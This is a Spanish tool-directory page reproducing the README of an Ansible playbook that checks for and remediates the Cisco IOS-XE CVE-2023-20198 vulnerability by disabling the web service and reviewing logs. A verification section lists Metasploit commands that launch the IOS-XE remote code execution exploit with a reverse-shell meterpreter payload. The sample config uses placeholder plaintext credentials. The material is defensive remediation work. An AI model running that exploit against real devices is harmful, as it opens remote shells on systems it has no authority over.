Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-20198-Fix — Verificar y remediar condiciones que hacen vulnerable un dispositivo IOS-XE a CVE-2023-20198 | Kitploit
Herramientas/GitHubGitHub/netbell/cve-2023-20198-fix
Escáneres de VulnerabilidadesExplotaciónAuditoría de ConfiguraciónSeguridad de RedesDevSecOpsRespuesta a Incidentes
GitHubnetbell/cve-2023-20198-fix

CVE-2023-20198-Fix

Verificar y remediar condiciones que hacen vulnerable un dispositivo IOS-XE a CVE-2023-20198

Ver Repositorio
hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-20198-Fix

Este repositorio contiene un playbook de Ansible para remediar la vulnerabilidad CVE-2023-20198 encontrada en ciertos dispositivos Cisco.

Hace lo siguiente:

  1. Verifica si el servicio web se está ejecutando en el router comprobando los comandos asociados en la configuración en ejecución.
  2. Deshabilita el servicio web si está en ejecución.
  3. Guarda la configuración si ha cambiado.
  4. Revisa los registros en busca de signos de explotación previa.

Estructura del directorio:

root@kitploit:~
CVE-2023-20198-Fix/
│
├── ansible.cfg            # Archivo de configuración de Ansible
├── group_vars/            # Directorio para variables específicas de grupos de hosts
│   └── iosxe_devices.yml  # Definiciones de variables para dispositivos IOS-XE
├── inventory.yml          # Inventario de hosts, incluidos los dispositivos a apuntar
└── remediate.yml          # Playbook para remediar CVE-2023-20198

Primeros pasos

Prerrequisitos

Asegúrese de tener Ansible instalado en su máquina de control. Este playbook fue escrito para Ansible 2.9 o superior.

Configuración

Configure Ansible: Edite ansible.cfg para que coincida con la configuración de su entorno.

Inventario:

Actualice inventory.yml con los detalles del host de sus dispositivos IOS-XE.

Variables:

Defina las variables necesarias en group_vars/iosxe_devices.yml. Esto debe incluir cualquier configuración común para sus dispositivos IOS-XE, como ajustes de conexión y credenciales.

Agregar hosts al inventario

Para agregar un nuevo dispositivo IOS-XE al inventario, edite el archivo inventory.yml y añada el nuevo host bajo el grupo correspondiente:

root@kitploit:~
iosxe_devices:
  hosts:
    vulnerable_router01:
      ansible_host: 192.168.1.3
      # ... otras variables necesarias

Reemplace new_router01 con el nombre de host de su dispositivo y las variables ansible_* con los valores reales de su dispositivo.

Actualizar variables de grupo

Si necesita actualizar credenciales u otros ajustes para el grupo de dispositivos IOS-XE, edite el archivo group_vars/iosxe_devices.yml:

root@kitploit:~
---
ansible_network_os: ios
ansible_connection: network_cli
ansible_user: admin
ansible_password: admin_password            # Solo para laboratorio, ¡almacene las credenciales de forma responsable!
ansible_become_method: enable
ansible_become_password: admin_password     # Solo para laboratorio, ¡almacene las credenciales de forma responsable!
# ... otras variables

Ejecutar el playbook

Para ejecutar el playbook, use el siguiente comando:

root@kitploit:~
ansible-playbook remediate.yml -i inventory.yml

Verificación con Metasploit

Comandos MSF6

root@kitploit:~
use exploit/linux/misc/cisco_ios_xe_rce
set RHOST 192.168.10.242     # Su IP objetivo
set target 1
set payload cmd/unix/python/meterpreter/reverse_tcp
check
exploit

Verificación previa a la remediación

Antes

Ejecución del playbook

Ejecución

Verificación posterior a la remediación

Antes

Pruebas

Siempre pruebe sus cambios en un entorno controlado antes de ejecutar el playbook en producción.

Seguridad

Almacene datos sensibles como contraseñas y claves secretas usando Ansible Vault. No almacene credenciales en texto plano en sus archivos de inventario o group_vars.

Para medidas de seguridad adicionales y mejores prácticas, consulte la documentación oficial de Ansible.

Reemplace todos los valores de marcador de posición con datos reales que correspondan a su entorno. Este README asume una familiaridad básica con conceptos de Ansible como inventario, variables y ejecución de playbooks.

Descargar herramienta